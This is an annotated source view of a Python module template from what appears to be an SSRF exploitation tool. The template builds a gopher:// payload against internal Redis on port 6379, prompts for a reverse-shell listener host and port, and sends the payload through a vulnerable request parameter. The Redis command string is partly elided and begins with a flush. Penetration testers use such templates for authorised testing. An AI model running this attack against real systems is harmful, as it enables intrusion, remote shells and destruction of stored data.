2018-10-16 22:54:13 +00:00
|
|
|
from core.utils import *
|
|
|
|
|
import logging
|
|
|
|
|
|
|
|
|
|
name = "servicename in lowercase"
|
|
|
|
|
description = "ServiceName RCE - What does it do"
|
|
|
|
|
author = "Name or pseudo of the author"
|
|
|
|
|
documentation = ["http://link_to_a_research", "http://another_link"]
|
|
|
|
|
|
|
|
|
|
class exploit():
|
2018-10-17 12:16:51 +00:00
|
|
|
SERVER_HOST = "127.0.0.1"
|
|
|
|
|
SERVER_PORT = "4242"
|
2018-10-16 22:54:13 +00:00
|
|
|
|
|
|
|
|
def __init__(self, requester, args):
|
2022-03-16 18:27:30 +00:00
|
|
|
logging.info(f"Module '{name}' launched !")
|
2018-10-16 22:54:13 +00:00
|
|
|
|
2018-10-17 12:16:51 +00:00
|
|
|
# Handle args for reverse shell
|
|
|
|
|
if args.lhost == None: self.SERVER_HOST = input("Server Host:")
|
|
|
|
|
else: self.SERVER_HOST = args.lhost
|
|
|
|
|
|
|
|
|
|
if args.lport == None: self.SERVER_PORT = input("Server Port:")
|
|
|
|
|
else: self.SERVER_PORT = args.lport
|
|
|
|
|
|
2018-10-17 12:03:43 +00:00
|
|
|
# Using a generator to create the host list
|
|
|
|
|
gen_host = gen_ip_list("127.0.0.1", args.level)
|
|
|
|
|
for ip in gen_host:
|
2018-10-16 22:54:13 +00:00
|
|
|
|
2018-10-17 12:16:51 +00:00
|
|
|
# Data and port for the service
|
2018-10-17 12:03:43 +00:00
|
|
|
port = "6379"
|
2018-10-17 12:16:51 +00:00
|
|
|
data = "*1%0d%0a$8%0d%0aflus[...]%0aquit%0d%0a"
|
2018-10-17 12:03:43 +00:00
|
|
|
payload = wrapper_gopher(data, ip , port)
|
2018-10-16 22:54:13 +00:00
|
|
|
|
2018-10-17 12:03:43 +00:00
|
|
|
# Handle args for reverse shell
|
2018-10-17 12:16:51 +00:00
|
|
|
payload = payload.replace("SERVER_HOST", self.SERVER_HOST)
|
|
|
|
|
payload = payload.replace("SERVER_PORT", self.SERVER_PORT)
|
2018-10-17 12:03:43 +00:00
|
|
|
|
|
|
|
|
# Send the payload
|
|
|
|
|
r = requester.do_request(args.param, payload)
|
